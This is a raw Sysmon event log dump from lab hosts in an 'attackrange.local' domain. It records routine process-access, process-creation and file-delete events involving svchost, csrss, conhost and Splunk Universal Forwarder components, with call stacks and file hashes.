12:22:46.875{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440033Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.875{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440032Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.875{42DC5269-CE96-6086-0500-00000000BA01}412428C:\Windows\system32\csrss.exe{42DC5269-0216-6088-B428-00000000BA01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440031Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.875{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-0216-6088-B428-00000000BA01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000440030Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.875{42DC5269-0216-6088-B428-00000000BA01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000440029Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.851{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=894A945D963043549EDE6BB042EFB6B3,SHA256=72ACA3C883457B770CACF68880C437258C58A543679779BE6E0D005E3132B311,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291347Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:46.812{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79A43F068E919A9D053E92006848FFE5,SHA256=D9EDC85EDB1B86465C3344875687EA6CE5091A057197B36D444F974885834E15,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440028Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.212{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-0216-6088-B328-00000000BA01}2612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440027Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.210{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440026Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.210{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440025Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.210{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440024Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.210{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440023Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.210{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440022Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.210{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440021Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.210{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440020Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.210{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440019Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.210{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440018Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.209{42DC5269-CE96-6086-0500-00000000BA01}412528C:\Windows\system32\csrss.exe{42DC5269-0216-6088-B328-00000000BA01}2612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440017Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.209{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-0216-6088-B328-00000000BA01}2612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000440016Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.209{42DC5269-0216-6088-B328-00000000BA01}2612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000440015Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.114{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440014Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:46.114{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291348Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:47.812{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2504CDD04ED0ACD80B0BDC5ED79F3BF,SHA256=10D1E77E3E66EC922BE76F7C8A3FC81A450E75AB8B78988DC10E5A734388AA92,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440059Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:47.682{42DC5269-0217-6088-B528-00000000BA01}63921128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440058Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:47.543{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-0217-6088-B528-00000000BA01}6392C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440057Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:47.541{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440056Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:47.541{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440055Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:47.541{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440054Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 